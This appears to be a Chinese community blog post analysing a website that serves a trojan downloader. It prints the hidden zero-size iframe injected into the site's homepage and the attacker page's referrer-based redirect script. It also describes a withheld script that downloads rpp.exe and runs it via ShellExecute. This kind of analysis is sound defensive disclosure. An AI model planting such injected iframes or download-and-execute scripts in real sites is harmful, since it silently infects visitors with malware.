AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

一个下载木马的网站

2024-09-29 7
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 一个下载木马的网站

网站首页插入如下代码:

/------------
<iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"></iframe>
------------/

hxxp://www.ac***66.cn/8***8/index.htm 的内容为:

/--------
<SCRIPT language="JavaScript">
function cameFrom(where) {
   if (!document.referrer && !where) return true;
   else return (document.referrer.indexOf(where)>=0)
   }
if (cameFrom("nen.com.cn")) {
   location.replace("3721.htm");
   }
else if (cameFrom("gov")) {
  location.replace("3721.htm");
   }
else if (cameFrom("or")) {
   location.replace("3721.htm");
   }
else if (cameFrom("bi")) {
   location.replace("3721.htm");
   }
else if (cameFrom("1488.com")) {
   location.replace("3721.htm");
   }
else {
   location.replace("mm.htm");
   }
</SCRIPT>
--------/

hxxp://www.ac***66.cn/8***8/mm.htm 的内容为:

/--------
<iframe src="hxxp://www.ac***66.cn/8***8/joke.htm" width="0" height="0" frameborder="0"></iframe>
<script src='hxxp://s**59.cnzz.com/stat.php?id=230393&web_id=230393&show=pic' language='JavaScript' charset='gb2312'></script>
--------/

hxxp://www.ac***66.cn/8***8/joke.htm 的内容为JavaScript脚本,由于其中包含了攻击者所属组织和QQ号,所里不公开具体内容。

该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.ac***66.cn/8***8/rpp.exe, 保存为 IE临时文件夹中的 g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。(这与  小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫  中第二段脚本程序相似)

g0ld.com               Kaspersky 报为 Trojan-Downloader.Win32.Delf.asb,瑞星报为 Trojan.DL.Delf.csh  


文章标签:
安全
JavaScript
前端开发
游客qeoynko2nmbgk
目录
相关文章
网站安全
|
云安全 SQL 弹性计算
阿里云提示网站后门发现后门(Webshell)文件的解决办法
2018年10月27日接到新客户网站服务器被上传了webshell脚本木马后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示异常网络连接-可疑WebShell通信行为,还会伴有,网站后门-发现后门(Webshell)文件,以及提示网站后门-一句话webshell的安全提示,但是大部分都是单独服务器ECS的用户,具体被阿里云提示的截图如下:
网站安全
2864 1
阿里云提示网站后门发现后门(Webshell)文件的解决办法
游客qeoynko2nmbgk
|
5天前
|
安全 JavaScript 前端开发
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
游客qeoynko2nmbgk
16 0
游客qeoynko2nmbgk
|
5天前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
游客qeoynko2nmbgk
13 0
sumith
|
5月前
|
安全 数据安全/隐私保护
webshell菜刀后门分析
webshell菜刀后门分析
sumith
31 1
sumith
|
5月前
|
安全 Shell
2021Kali -- 木马免杀制作
2021Kali -- 木马免杀制作
sumith
81 1
网站安全
|
SQL 缓存 弹性计算
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
网站安全
2406 0
阿里云提示网站后门发现后门(Webshell)文件该怎么解决
网站安全
|
安全 JavaScript 前端开发
网站总是被上传漏洞上传了木马后门被入侵怎么办
SINE安全又带上业务逻辑漏洞来跟大家做分享了,这一次的主题内容是上传文件漏洞。许许多多企业网站都准许客户自己图片上传、电子版资料,假如上传功能并没有搞好安全防护对策,就存有极大的安全隐患。假如网站应用领域在上传文件流程中并没有对文档的安全性能采取合理的校检,攻击者能够根据上传webshell等恶意文档对php服务器攻击,这样的情况下指出操作系统存有上传文件漏洞。下列是我汇总的一小部分上传漏洞的情景,假如你拥有掌握其他上传避过姿势还可以和我们讨论讨论。
网站安全
210 0
网站总是被上传漏洞上传了木马后门被入侵怎么办
科技小能手
|
安全 测试技术
菜刀不能成功连接已上传木马
科技小能手
3518 0
游客r774rqf2u4xgs
|
存储 安全 网络安全
web渗透_一句话木马(webshell)_dvwa环境
web渗透_一句话木马(webshell)_dvwa环境
游客r774rqf2u4xgs
328 0
web渗透_一句话木马(webshell)_dvwa环境
网站安全
|
开发框架 安全 Java
网站后门木马查杀该怎么删除
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
网站安全
359 0
网站后门木马查杀该怎么删除